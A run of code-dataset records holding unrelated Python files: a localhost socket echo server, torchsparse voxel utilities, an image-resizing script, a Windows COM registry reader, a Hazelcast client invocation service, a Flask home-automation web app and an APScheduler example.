Study(**data)\n\n","sub_path":"crc/models/study.py","file_name":"study.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"492111725","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__title__ = '04 多进程并发_服务端_scoket.py'\n__author__ = 'yangyang'\n__mtime__ = '2018.03.08'\n\"\"\"\n\nimport socket\nfrom multiprocessing import Process\n\ndef talk(conn):\n\twhile True:\n\t\ttry:\n\t\t\tres = conn.recv(1024)\n\t\t\tif not res:continue\n\t\t\tprint(\"recv:\",res)\n\t\t\tconn.send(res)\n\t\texcept ConnectionResetError:\n\t\t\tbreak\n\tconn.close()\n\ndef server(ip_port):\n\tserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\tserver.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\tserver.bind(ip_port)\n\tserver.listen(5)\n\n\twhile True:\n\t\tconn,client_addr = server.accept()\n\t\tp = Process(target=talk,args=(conn,))\n\t\tp.start()\n\tserver.close()\n\n\nif __name__ == '__main__':\n\tip_port = ('127.0.0.1',8090)\n\tserver(ip_port)\n\n\n","sub_path":"fourth_module/复习/04 多进程并发_服务端_scoket.py","file_name":"04 多进程并发_服务端_scoket.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"186306603","text":"import torchsparse\nimport torchsparse.nn as spnn\nimport torchsparse.nn.functional as spf\nfrom torchsparse.sparse_tensor import SparseTensor\nfrom torchsparse.point_tensor import PointTensor\nfrom torchsparse.utils.kernel_region import *\nfrom torchsparse.utils.helpers import *\n\n\n__all__ = ['initial_voxelize', 'point_to_voxel', 'voxel_to_point']\n\n\n# z: PointTensor\n# return: SparseTensor\ndef initial_voxelize(z, init_res, after_res):\n new_float_coord = torch.cat(\n [(z.C[:, :3] * init_res) / after_res, z.C[:, -1].view(-1, 1)], 1)\n\n pc_hash = spf.sphash(torch.floor(new_float_coord).int())\n sparse_hash = torch.unique(pc_hash)\n idx_query = spf.sphashquery(pc_hash, sparse_hash)\n counts = spf.spcount(idx_query.int(), len(sparse_hash))\n\n inserted_coords = spf.spvoxelize(torch.floor(new_float_coord), idx_query,\n counts)\n inserted_coords = torch.round(inserted_coords).int()\n inserted_feat = spf.spvoxelize(z.F, idx_query, counts)\n\n new_tensor = SparseTensor(inserted_feat, inserted_coords, 1)\n new_tensor.check()\n z.additional_features['idx_query'][1] = idx_query\n z.additional_features['counts'][1] = counts\n z.C = new_float_coord\n\n return new_tensor\n\n\n# x: SparseTensor, z: PointTensor\n# return: SparseTensor\ndef point_to_voxel(x, z):\n if z.additional_features is None or z.additional_features.get('idx_query') is None\\\n or z.additional_features['idx_query'].get(x.s) is None:\n #pc_hash = hash_gpu(torch.floor(z.C).int())\n pc_hash = spf.sphash(\n torch.cat([\n torch.floor(z.C[:, :3] / x.s).int() * x.s,\n z.C[:, -1].int().view(-1, 1)\n ], 1))\n sparse_hash = spf.sphash(x.C)\n idx_query = spf.sphashquery(pc_hash, sparse_hash)\n counts = spf.spcount(idx_query.int(), x.C.shape[0])\n z.additional_features['idx_query'][x.s] = idx_query\n z.additional_features['counts'][x.s] = counts\n else:\n idx_query = z.additional_features['idx_query'][x.s]\n counts = z.additional_features['counts'][x.s]\n\n inserted_feat = spf.spvoxelize(z.F, idx_query, counts)\n new_tensor = SparseTensor(inserted_feat, x.C, x.s)\n new_tensor.coord_maps = x.coord_maps\n new_tensor.kernel_maps = x.kernel_maps\n\n return new_tensor\n\n\n# # x: SparseTensor, z: PointTensor\n# # return: PointTensor\n# def voxel_to_point(x, z, nearest=False):\n# if z.idx_query is None or z.weights is None or z.idx_query.get(\n# x.s) is None or z.weights.get(x.s) is None:\n# kr = KernelRegion(2, x.s, 1)\n# off = kr.get_kernel_offset().to(z.F.device)\n# #old_hash = kernel_hash_gpu(torch.floor(z.C).int(), off)\n# old_hash = spf.sphash(\n# torch.cat([\n# torch.floor(z.C[:, :3] / x.s).int() * x.s,\n# z.C[:, -1].int().view(-1, 1)\n# ], 1), off)\n# pc_hash = spf.sphash(x.C.to(z.F.device))\n# idx_query = spf.sphashquery(old_hash, pc_hash)\n# weights = spf.calc_ti_weights(z.C, idx_query,\n# scale=x.s).transpose(0, 1).contiguous().float()\n# idx_query = idx_query.transpose(0, 1).contiguous()\n# if nearest:\n# weights[:, 1:] = 0.\n# idx_query[:, 1:] = -1\n# new_feat = spf.spdevoxelize(x.F, idx_query, weights)\n# new_tensor = PointTensor(new_feat,\n# z.C,\n# idx_query=z.idx_query,\n# weights=z.weights)\n# new_tensor.additional_features = z.additional_features\n# new_tensor.idx_query[x.s] = idx_query\n# new_tensor.weights[x.s] = weights\n# z.idx_query[x.s] = idx_query\n# z.weights[x.s] = weights\n\n# else:\n# new_feat = spf.spdevoxelize(x.F, z.idx_query.get(x.s), z.weights.get(x.s))\n# new_tensor = PointTensor(new_feat,\n# z.C,\n# idx_query=z.idx_query,\n# weights=z.weights)\n# new_tensor.additional_features = z.additional_features\n\n# return new_tensor\n\n\ndef calc_ti_weights(coords, idx_query):\n mask = torch.cuda.FloatTensor(\n [[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1],\n [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1]])\n frac = coords - torch.floor(coords)\n frac = frac[:, 0:3]\n frac = torch.cuda.FloatTensor([1, 1, 1]) - mask - torch.unsqueeze(frac, dim=1)\n weights = torch.abs(torch.prod(frac, dim=2)).t()\n weights[idx_query == -1] = 0\n weights /= weights.sum(0) + 1e-8\n return weights\n\n# x: SparseTensor, z: PointTensor\n# return: PointTensor\ndef voxel_to_point(x, z, nearest=False):\n #print(x.s)\n #print(z.C.shape)\n h = x.C.shape[0]\n npt = z.C.shape[0] \n if z.idx_query is None or z.weights is None or z.idx_query.get(\n x.s) is None or z.weights.get(x.s) is None:\n kr = KernelRegion(2, x.s, 1)\n off = kr.get_kernel_offset().to(z.F.device)\n #old_hash = kernel_hash_gpu(torch.floor(z.C).int(), off)\n old_hash = spf.sphash(\n torch.cat([\n torch.floor(z.C[:, :3] / x.s).int() * x.s,\n z.C[:, -1].int().view(-1, 1)\n ], 1), off)\n pc_hash = spf.sphash(x.C.to(z.F.device))\n idx_query = spf.sphashquery(old_hash, pc_hash)\n weights = calc_ti_weights(z.C, idx_query).transpose(0, 1).contiguous()\n\n idx_query = idx_query.transpose(0, 1).contiguous()\n #print(idx_query[idx_query==-1])\n\n ids = torch.arange(npt).view(npt, 1).cuda()\n ids = ids.repeat(1, 8).view(-1)\n idx = idx_query.view(-1)\n flgs = idx > -1\n ids = ids[flgs]\n idx = idx[flgs]\n weights = weights.view(-1)[flgs].float()\n \n indices = torch.cat([torch.unsqueeze(ids, dim=1), torch.unsqueeze(idx, dim=1)], dim=1).long()\n\n mat = torch.sparse.FloatTensor(indices.t(), weights, torch.Size([npt, h])).cuda()\n\n new_feat = torch.sparse.mm(mat, x.F)\n\n new_tensor = PointTensor(new_feat,\n z.C,\n idx_query=z.idx_query,\n weights=z.weights)\n new_tensor.additional_features = z.additional_features\n new_tensor.idx_query[x.s] = idx_query\n new_tensor.weights[x.s] = weights\n z.idx_query[x.s] = idx_query\n z.weights[x.s] = weights\n\n else:\n weights = z.weights.get(x.s)\n idx_query = z.idx_query.get(x.s)\n \n ids = torch.arange(npt).view(npt, 1).cuda()\n ids = ids.repeat(1, 8).view(-1)\n idx = idx_query.view(-1)\n flgs = idx > -1\n ids = ids[flgs]\n idx = idx[flgs]\n weights = weights.view(-1)[flgs]\n indices = torch.cat([torch.unsqueeze(ids, dim=1), torch.unsqueeze(idx, dim=1)], dim=1).long()\n\n mat = torch.sparse.FloatTensor(indices.t(), weights, torch.Size([npt, h])).cuda()\n new_feat = torch.sparse.mm(mat, x.F)\n \n new_tensor = PointTensor(new_feat,\n z.C,\n idx_query=z.idx_query,\n weights=z.weights)\n new_tensor.additional_features = z.additional_features\n\n return new_tensor\n\n\ndef nearest_voxel(x, z):\n #print(x.s)\n #print(z.C.shape)\n #old_hash = kernel_hash_gpu(torch.floor(z.C).int(), off)\n old_hash = spf.sphash(\n torch.cat([\n torch.floor(torch.round(z.C[:, :3]) / x.s).int() * x.s,\n z.C[:, -1].int().view(-1, 1)\n ], 1))\n pc_hash = spf.sphash(x.C.to(z.F.device))\n idx_query = spf.sphashquery(old_hash, pc_hash)\n assert((idx_query!=-1).all())\n new_feat = x.F[idx_query, :]\n new_tensor = PointTensor(new_feat,\n z.C)\n\n return new_tensor","sub_path":"spvnas_patch/spvnas/core/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"34207991","text":"##################################################\n## {Description}: Rename and resize the dataset by \n## numbering format e.g.: 000001.png\n##################################################\n## Author: Khairul Izwan Bin Kamsani\n## Version: {1}.{0}.{0}\n## Email: {wansnap@gmail.com}\n##################################################\n\n# import the necessary packages\nfrom imutils import paths\nimport argparse\nimport imutils\nimport cv2\nimport os\n\nfrom pyimagesearch.preprocessing.aspectawarepreprocessor import AspectAwarePreprocessor\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", required=True, \n\thelp=\"path to input directory of images\")\nap.add_argument(\"-a\", \"--annot\", required=True, \n\thelp=\"path to output directory of annotations\")\nap.add_argument(\"-f\", \"--folder\", required=True, help=\"folder name\")\nap.add_argument(\"-ws\", \"--width\", required=False, default=200, \n\thelp=\"width size\")\nap.add_argument(\"-hs\", \"--height\", required=False, default=200, \n\thelp=\"height size\")\nargs = vars(ap.parse_args())\n\n# grab the image paths then initialize the dictionary of character\n# counts\nimagePaths = list(paths.list_images(args[\"input\"]))\ncount = 0\n\n# initiate aspectawarepreprocessor\naap = AspectAwarePreprocessor(args[\"width\"], args[\"height\"])\n\n# loop over the image paths\nfor (i, imagePath) in enumerate(imagePaths):\n\t# display an update to the user\n\tprint(\"[INFO] processing image {}/{}\".format(i + 1, len(imagePaths)))\n\n\ttry:\n\t\t# load the image\n\t\timage = cv2.imread(imagePath)\n\n\t\t# resize the image\n\t\timage = aap.preprocess(image)\n\n\t\t# construct the path the output directory\n\t\tdirPath = os.path.join(args[\"annot\"], args[\"folder\"])\n\n\t\t# if the output directory does not exist, create it\n\t\tif not os.path.exists(dirPath):\n\t\t\tos.makedirs(dirPath)\n\n\t\t# write the labeled character to file\n\t\tp = os.path.sep.join([dirPath, \"{}_W{}H{}.png\".format(\n\t\t\tstr(count).zfill(6), args[\"width\"], args[\"height\"])])\n\t\tcv2.imwrite(p, image)\n\t\n\t\t# increment the count for the current key\n\t\tcount = count + 1\n\n\t# we are trying to control-c out of the script, so break from the\n\t# loop (you still need to press a key for the active window to\n\t# trigger this)\n\texcept KeyboardInterrupt:\n\t\tprint(\"[INFO] manually leaving script\")\n\t\tbreak\n\n\t# an unknown error has occurred for this particular image\n\texcept:\n\t\tprint(\"[INFO] skipping image...\")\n","sub_path":"intelligent_robot_vision/vision_oil_palm_fruit_detection/scripts/resize_aspect_ratio_dataset.py","file_name":"resize_aspect_ratio_dataset.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"309868527","text":"import os\nimport sys\nimport lib_common\nfrom lib_properties import pc\n\nimport win32con\nimport win32api\n\nTypeLibRegistryKey = win32api.RegOpenKey(win32con.HKEY_CLASSES_ROOT, \"TypeLib\")\n\ndef ComKeyAllNameVersion(key, keyName):\n\tresult = {}\n\tsys.stderr.write(\"ComKeyAllNameVersion key=%s keyName=%s\\n\" % (key,keyName) )\n\n\ttry:\n\t\tsubKey = win32api.RegOpenKey(key, keyName)\n\texcept:\n\t\texc = sys.exc_info()\n\t\tlib_common.ErrorMessageHtml(\"ComKeyAllNameVersion key=%s keyName=%s. Error:%s\"%(key,keyName,str(exc)))\n\n\ttry:\n\t\t\tsubNum = 0\n\t\t\tbestVersion = 0.0\n\t\t\twhile 1:\n\t\t\t\t\ttry:\n\t\t\t\t\t\t\tversionStr = win32api.RegEnumKey(subKey, subNum)\n\t\t\t\t\texcept win32api.error:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tname = win32api.RegQueryValue(subKey, versionStr)\n\t\t\t\t\t# sys.stderr.write(\"name=%s\\n\" % name)\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\t\tversionFlt = float(versionStr)\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\tversionFlt = 0 # ????\n\n\t\t\t\t\tresult[ versionFlt ] = name\n\t\t\t\t\tsubNum = subNum + 1\n\tfinally:\n\t\t\twin32api.RegCloseKey(subKey)\n\n\treturn result\n\ndef ComKeyLastName(result):\n\tbestVrs = -999.0\n\tbestNam = \"\"\n\n\tfor vers, name in list( result.items() ):\n\t\tif vers > bestVrs:\n\t\t\tbestVrs = vers\n\t\t\tbestNam = name\n\t\t\t\n\treturn ( bestNam, bestVrs )\n\ndef CreateComRegisteredTypeLibNode( grph, key, name, version ):\n\ttypelibNode = lib_common.gUriGen.ComRegisteredTypeLibUri( key )\n\tstrTypLibName = \"%s / %.1f\" % ( name , version )\n\tgrph.add( (typelibNode, pc.property_information, lib_common.NodeLiteral(strTypLibName) ) )\n\n\treturn typelibNode\n","sub_path":"survol/lib_com_type_lib.py","file_name":"lib_com_type_lib.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"131750603","text":"import logging\nimport time\nimport functools\n\nfrom hazelcast.errors import create_error_from_message, HazelcastInstanceNotActiveError, is_retryable_error, \\\n HazelcastTimeoutError, TargetDisconnectedError, HazelcastClientNotActiveError, TargetNotMemberError, \\\n EXCEPTION_MESSAGE_TYPE\nfrom hazelcast.future import Future\nfrom hazelcast.util import AtomicInteger\nfrom hazelcast import six\n\n\ndef _no_op_response_handler(_):\n pass\n\n\nclass Invocation(object):\n __slots__ = (\"request\", \"timeout\", \"partition_id\", \"uuid\", \"connection\", \"event_handler\",\n \"future\", \"sent_connection\", \"urgent\", \"response_handler\")\n\n def __init__(self, request, partition_id=-1, uuid=None, connection=None,\n event_handler=None, urgent=False, timeout=None, response_handler=_no_op_response_handler):\n self.request = request\n self.partition_id = partition_id\n self.uuid = uuid\n self.connection = connection\n self.event_handler = event_handler\n self.urgent = urgent\n self.timeout = timeout\n self.future = Future()\n self.timeout = None\n self.sent_connection = None\n self.response_handler = response_handler\n\n def set_response(self, response):\n try:\n result = self.response_handler(response)\n self.future.set_result(result)\n except Exception as e:\n self.future.set_exception(e)\n\n def set_exception(self, exception, traceback=None):\n self.future.set_exception(exception, traceback)\n\n\nclass InvocationService(object):\n logger = logging.getLogger(\"HazelcastClient.InvocationService\")\n\n def __init__(self, client, reactor, logger_extras):\n config = client.config\n if config.network.smart_routing:\n self.invoke = self._invoke_smart\n else:\n self.invoke = self._invoke_non_smart\n\n self._client = client\n self._reactor = reactor\n self._logger_extras = logger_extras\n self._partition_service = None\n self._connection_manager = None\n self._listener_service = None\n self._check_invocation_allowed_fn = None\n self._pending = {}\n self._next_correlation_id = AtomicInteger(1)\n self._is_redo_operation = config.network.redo_operation\n self._invocation_timeout = self._init_invocation_timeout()\n self._invocation_retry_pause = self._init_invocation_retry_pause()\n self._shutdown = False\n\n def start(self, partition_service, connection_manager, listener_service):\n self._partition_service = partition_service\n self._connection_manager = connection_manager\n self._listener_service = listener_service\n self._check_invocation_allowed_fn = connection_manager.check_invocation_allowed\n\n def handle_client_message(self, message):\n correlation_id = message.get_correlation_id()\n\n if message.start_frame.has_event_flag():\n self._listener_service.handle_client_message(message, correlation_id)\n return\n\n invocation = self._pending.pop(correlation_id, None)\n if not invocation:\n self.logger.warning(\"Got message with unknown correlation id: %s\", message, extra=self._logger_extras)\n return\n\n if message.get_message_type() == EXCEPTION_MESSAGE_TYPE:\n error = create_error_from_message(message)\n return self._handle_exception(invocation, error)\n\n invocation.set_response(message)\n\n def shutdown(self):\n self._shutdown = True\n for invocation in list(six.itervalues(self._pending)):\n self._handle_exception(invocation, HazelcastClientNotActiveError())\n\n def _invoke_on_partition_owner(self, invocation, partition_id):\n owner_uuid = self._partition_service.get_partition_owner(partition_id)\n if not owner_uuid:\n self.logger.debug(\"Partition owner is not assigned yet\", extra=self._logger_extras)\n return False\n return self._invoke_on_target(invocation, owner_uuid)\n\n def _invoke_on_target(self, invocation, owner_uuid):\n connection = self._connection_manager.get_connection(owner_uuid)\n if not connection:\n self.logger.debug(\"Client is not connected to target: %s\" % owner_uuid, extra=self._logger_extras)\n return False\n return self._send(invocation, connection)\n\n def _invoke_on_random_connection(self, invocation):\n connection = self._connection_manager.get_random_connection()\n if not connection:\n self.logger.debug(\"No connection found to invoke\", extra=self._logger_extras)\n return False\n return self._send(invocation, connection)\n\n def _invoke_smart(self, invocation):\n if not invocation.timeout:\n invocation.timeout = self._invocation_timeout + time.time()\n\n try:\n if not invocation.urgent:\n self._check_invocation_allowed_fn()\n\n connection = invocation.connection\n if connection:\n invoked = self._send(invocation, connection)\n if not invoked:\n self._handle_exception(invocation, IOError(\"Could not invoke on connection %s\" % connection))\n return\n\n if invocation.partition_id != -1:\n invoked = self._invoke_on_partition_owner(invocation, invocation.partition_id)\n elif invocation.uuid:\n invoked = self._invoke_on_target(invocation, invocation.uuid)\n else:\n invoked = self._invoke_on_random_connection(invocation)\n\n if not invoked:\n invoked = self._invoke_on_random_connection(invocation)\n\n if not invoked:\n self._handle_exception(invocation, IOError(\"No connection found to invoke\"))\n except Exception as e:\n self._handle_exception(invocation, e)\n\n def _invoke_non_smart(self, invocation):\n if not invocation.timeout:\n invocation.timeout = self._invocation_timeout + time.time()\n\n try:\n if not invocation.urgent:\n self._check_invocation_allowed_fn()\n\n connection = invocation.connection\n if connection:\n invoked = self._send(invocation, connection)\n if not invoked:\n self._handle_exception(invocation, IOError(\"Could not invoke on connection %s\" % connection))\n return\n\n if not self._invoke_on_random_connection(invocation):\n self._handle_exception(invocation, IOError(\"No connection found to invoke\"))\n except Exception as e:\n self._handle_exception(invocation, e)\n\n def _init_invocation_retry_pause(self):\n invocation_retry_pause = self._client.properties.get_seconds_positive_or_default(\n self._client.properties.INVOCATION_RETRY_PAUSE_MILLIS)\n return invocation_retry_pause\n\n def _init_invocation_timeout(self):\n invocation_timeout = self._client.properties.get_seconds_positive_or_default(\n self._client.properties.INVOCATION_TIMEOUT_SECONDS)\n return invocation_timeout\n\n def _send(self, invocation, connection):\n if self._shutdown:\n raise HazelcastClientNotActiveError()\n\n correlation_id = self._next_correlation_id.get_and_increment()\n message = invocation.request\n message.set_correlation_id(correlation_id)\n message.set_partition_id(invocation.partition_id)\n self._pending[correlation_id] = invocation\n\n if invocation.event_handler:\n self._listener_service.add_event_handler(correlation_id, invocation.event_handler)\n\n self.logger.debug(\"Sending %s to %s\", message, connection, extra=self._logger_extras)\n\n if not connection.send_message(message):\n if invocation.event_handler:\n self._listener_service.remove_event_handler(correlation_id)\n return False\n return True\n\n def _handle_exception(self, invocation, error, traceback=None):\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"Got exception for request %s, error: %s\" % (invocation.request, error),\n extra=self._logger_extras)\n\n if not self._client.lifecycle_service.is_running():\n invocation.set_exception(HazelcastClientNotActiveError(), traceback)\n self._pending.pop(invocation.request.get_correlation_id(), None)\n return\n\n if not self._should_retry(invocation, error):\n invocation.set_exception(error, traceback)\n self._pending.pop(invocation.request.get_correlation_id(), None)\n return\n\n if invocation.timeout < time.time():\n self.logger.debug(\"Error will not be retried because invocation timed out: %s\", error,\n extra=self._logger_extras)\n invocation.set_exception(HazelcastTimeoutError(\"Request timed out because an error occurred after \"\n \"invocation timeout: %s\" % error, traceback))\n self._pending.pop(invocation.request.get_correlation_id(), None)\n return\n\n invoke_func = functools.partial(self.invoke, invocation)\n self._reactor.add_timer(self._invocation_retry_pause, invoke_func)\n\n def _should_retry(self, invocation, error):\n if invocation.connection and isinstance(error, (IOError, TargetDisconnectedError)):\n return True\n\n if invocation.uuid and isinstance(error, TargetNotMemberError):\n return False\n\n if isinstance(error, (IOError, HazelcastInstanceNotActiveError)) or is_retryable_error(error):\n return True\n\n if isinstance(error, TargetDisconnectedError):\n return invocation.request.retryable or self._is_redo_operation\n\n return False\n","sub_path":"hazelcast/invocation.py","file_name":"invocation.py","file_ext":"py","file_size_in_byte":9936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255200325","text":"from flask import Flask, render_template, redirect, request, jsonify\nimport time\nimport sys\nimport logging\n#from scipy import signal\nimport __main__ as main\nimport Alarm\n\napp = Flask(__name__, static_url_path='/static')\nrooms = []\n\n#initialize global variables\ndef init():\n global rooms\n for key in main.rooms:\n if 'lights' in main.rooms[key]:\n rooms.append(key)\n return None\n\n#Make sure the browser does not cache any of the images.\n#Prevents non updating measurement graphs\n@app.after_request\ndef add_header(response):\n response.cache_control.max_age = 1\n return response\n\n@app.route('/')\ndef homePage():\n global rooms\n return render_template('index.html',\n rooms=rooms,\n page=\"home\")\n\n#handle to show the graphs of every room and the pi\n@app.route('/graphs')\ndef graphs():\n global rooms\n return render_template('index.html',\n rooms = rooms,\n page='graphs')\n\n#Here are the handles for alarms\n@app.route('/alarm')\ndef alarm():\n global rooms\n Alarms = [key for key in Alarm.AlarmDict.keys()]\n return render_template('index.html',\n rooms = rooms,\n alarms = Alarms,\n page = 'alarm')\n\n@app.route('/alarm/setAlarm', methods=[\"POST\"])\ndef setAlarm():\n JSON = request.get_json(force=True)\n if not ( (\"Hour\" in JSON) and (\"Minute\" in JSON) ):\n return (\"\", 204)\n Hour = JSON[\"Hour\"]\n Minute = JSON[\"Minute\"]\n PreWakeUp = JSON.get(\"PreWakeUp\", None)\n Alarm.setupAlarm(Hour, Minute, PreWakeUp=PreWakeUp)\n return(\"\", 418)\n\n@app.route('/alarm/disableAlarm', methods=[\"POST\"])\ndef disableAlarm():\n JSON = request.get_json(force=True)\n if not \"AlarmName\" in JSON:\n return(\"\",204)\n Alarm.AlarmDict[JSON[\"AlarmName\"]][\"Stop\"] = True\n return(\"\",204)\n\n#From here on all the light handles begin\n@app.route('/rooms/')\ndef ledPage(roomID):\n global rooms\n if (roomID in rooms):\n Lights = {}\n for Light in [*main.rooms[roomID]['lights']]:\n Lights[Light] = main.rooms[roomID][\"lights\"][Light].functdict.keys()\n print(Lights)\n return render_template('index.html',\n rooms = rooms,\n roomID = roomID,\n lights = [*main.rooms[roomID]['lights']],\n functdict = main.rooms[roomID]['lights']['LedStrip'].functdict,\n color_rgb = main.rooms[roomID]['lights']['LedStrip'].color_rgb,\n wait = main.rooms[roomID]['lights']['LedStrip'].wait,\n page='led')\n else:\n return('404 not found, you have not installed this light')\n\n\n\n@app.route('/rooms/color', methods=[\"POST\"])\n# expect JSON in the following format:\n# {'roomID':A rooms defined in main\n# 'lightIDs':A list of lightIDs defined in main,\n# 'r': 0, 'g':0, 'b':0}\ndef colorControl():\n color = {'r':0,'g':0,'b':0}\n json = request.get_json(force=True)\n for key in color:\n color[key] = int(json[key])\n lightIDs = json['lightIDs']\n roomID = json['roomID']\n for lightID in lightIDs:\n main.rooms[roomID]['lights'][lightID].color_rgb = color\n return(\"\",204)\n\n@app.route('/rooms/function', methods=[\"POST\"])\ndef functionControl():\n #expect JSON with following format\n #{'roomID': A room defined in main.\n # 'lightIDs': A list of lightIDs defined in main.\n # 'function': An accepted function for the light}\n function = \"\"\n json = request.get_json(force=True)\n roomID = json['roomID']\n lightIDs = json['lightIDs']\n function = json['function']\n for lights in lightIDs:\n main.rooms[roomID]['lights'][lights].function = function\n return(\"\",204)\n\n@app.route('/rooms/attrNum', methods=[\"POST\"])\ndef attributeControlNum():\n #expect JSON with following format\n # {'roomID': A room defined in main,\n # 'lightIDs': A list of lightIDs defined in main.\n # 'key':value -> key is the variable that needs to be set to value\n # }\n json = request.get_json(force=True)\n roomID = json['roomID']\n lightIDs = json['lightIDs']\n json.pop('roomID', None)\n json.pop('lightIDs', None)\n attributes={}\n for key,value in json.items():\n attributes[key] = value\n #try:\n for lights in lightIDs:\n for key,value in attributes.items():\n setattr(main.rooms[roomID]['lights'][lights],\n key,\n float(value))\n #except:\n # pass\n return(\"\",204)\n\n@app.route('/rooms/attrBool', methods=[\"POST\"])\ndef attributeControlBool():\n #expect JSON with following format\n # {'roomID': A room defined in main,\n # 'lightIDs': A list of lightIDs defined in main.\n # 'key':value -> key is the variable that needs to be set to value\n # }\n\n json = request.get_json(force=True)\n roomID = json['roomID']\n lightIDs = json['lightIDs']\n json.pop('roomID', None)\n json.pop('lightIDs', None)\n attributes={}\n for key,value in json.items():\n attributes[key] = value\n try:\n for lights in lightIDs:\n for key,value in attributes.items():\n setattr(main.rooms[roomID]['lights'][lights],\n key,\n bool(value))\n except:\n pass\n return(\"\",204)\n\n@app.route('/rooms/data', methods=[\"POST\"])\ndef returnData():\n # expect json with only the room ID in it, return with the data in json\n json = request.get_json(force=True)\n try:\n roomID = json['roomID']\n if roomID in main.rooms:\n response = {}\n response.update(main.rooms[roomID][\"room\"].json)\n if \"lightID\" in json:\n response.update({\"color\": main.rooms[roomID][\"lights\"][json[\"lightID\"]].color_rgb})\n return(jsonify(response), 200)\n else:\n return(\"\",418) #I'm a teapot\n except:\n return(jsonify({'error': 'invalid'}), 200)\n\n@app.route('/rooms/graphData', methods=[\"POST\"])\ndef returnGraphData():\n # expect json with roomID\n JSON = request.get_json(force = True)\n RoomID = JSON[\"RoomID\"]\n Items = int(JSON.get(\"Items\", 1000))\n print(\"Items: {}\".format(Items))\n print(\"RoomID: {}\".format(RoomID))\n Data, Time = main.rooms[RoomID][\"room\"].getDataFromDB(Items = Items)\n # Temperature = signal.savgol_filter(Data[\"temperature\"], 25, 3)\n # Humidity = signal.savgol_filter(Data[\"humidity\"], 25, 3)\n # LDR = signal.savgol_filter(Data[\"ldr\"], 25, 3)\n Temperature = Data[\"temperature\"]\n Humidity = Data[\"humidity\"]\n LDR = Data[\"ldr\"]\n Graphs = [\n dict(\n data=[\n dict(\n x = Time,\n y = Temperature,\n name = \"Temperature\",\n yaxis = \"Temperature\",\n type = \"lines\"\n ),\n dict(\n x = Time,\n y = Humidity,\n name = \"Humidity\",\n yaxis = \"y2\",\n type = \"lines\"\n )\n ],\n layout = dict(\n title = \"Temperature and Humidity\",\n yaxis = {\"title\": \"Degree Celsius\"},\n xaxis = {\"automargin\": True},\n yaxis2 = dict(\n title = \"Relative Humidity\",\n overlaying = \"y\",\n side = \"right\"\n )\n )\n ),\n dict(\n data=[\n dict(\n x = Time,\n y = LDR,\n name = \"LDR\",\n yaxis = \"LDR\",\n type = \"lines\"\n )\n ],\n layout = dict(\n title = \"LDR\",\n xaxis = {\"automargin\": True},\n yaxis = {\"title\": \"Relative light strength\"},\n showlegend = True\n )\n )\n ]\n\n GraphsJSON = jsonify(Graphs)\n return(GraphsJSON)\n\n@app.route('/ritregistration')\ndef ritRegistration():\n global rooms\n return render_template('index.html',\n rooms = rooms,\n page='ritRegistration')\n\n@app.route('/ritregistration/addNew', methods=[\"POST\"])\ndef addNewMileage():\n #expects json with \"KMStand\", \"BeginEindPunt\", \"Getankt\"\n json = request.get_json(force=True)\n try:\n KMStand = json[\"KMStand\"]\n BeginEndPoint = json[\"BeginEindPunt\"]\n Tanked = json[\"Getankt\"]\n main.RitReg.insertMileage(KMStand, BeginEndPoint, Tanked)\n return(\"\",418)\n except Exception as e:\n return(e,400)\n\n@app.route('/ritregistration/getData')\ndef returnRitData():\n DataList = main.RitReg.getAllData()\n DataList.reverse()\n return(jsonify(DataList), 200)\n\n@app.route('/ritregistration/getMileage')\ndef returnMileAge():\n MileAges, MileAge = main.RitReg.averageMileage()\n return(jsonify({\"Mileage\": MileAge, \"Mileages\": MileAges}), 200)\n","sub_path":"LedServer/Website/WEB.py","file_name":"WEB.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"188740978","text":"## 리눅스에서만 가능함\n## 파일명 : cron01.py\n\n#pip install apscheduler\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nimport time\n# apscheduler 를 install 하고 import 한다\n# 먼저 함수를 작성한 후, scheduler에 add.job을 통해 넣어준다\n# 넣어줄 때 인터벌과 분,초 등을 같이 넣어주면 함수를 통한 출력값을 인터벌, 분, 초 단위로 출력한다\n\n\n# 먼저 hello world를 출력하겠다고 하는 함수를 작성한다.\n# 이 외에도 print보다 복잡한 함수를 실행시키도 싶어도 될 것 같다.\ndef exec_interval(): \n print(\"hello world\")\n \n# 두 번째 함수를 작성한다.(해도 되고 안 해도 됨)\n# time.localtime이라는 함수가 아마 현재 시간을 출력하는 것 같다\ndef exec_cron(): \n str = time.strftime('%c', time.localtime(time.time()))\n print(\"cron\", str)\n\nsched = BlockingScheduler()\n# 5초 간격으로 exec_interval()함수 호출하기\n# 위에서 만든 함수를 추가하고\nsched.add_job(exec_interval, 'interval', seconds=10)\n\n# 예약 방식 (매시간 10초 30초 일 경우 구동)\n# 하나 더 추가하고\nsched.add_job(exec_cron, 'cron', minute=\"*\", second=\"20-30\")\nsched.start()","sub_path":"web_practice/crawling/cron01.py","file_name":"cron01.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"313731809","text":"from .core import exceptions\nfrom 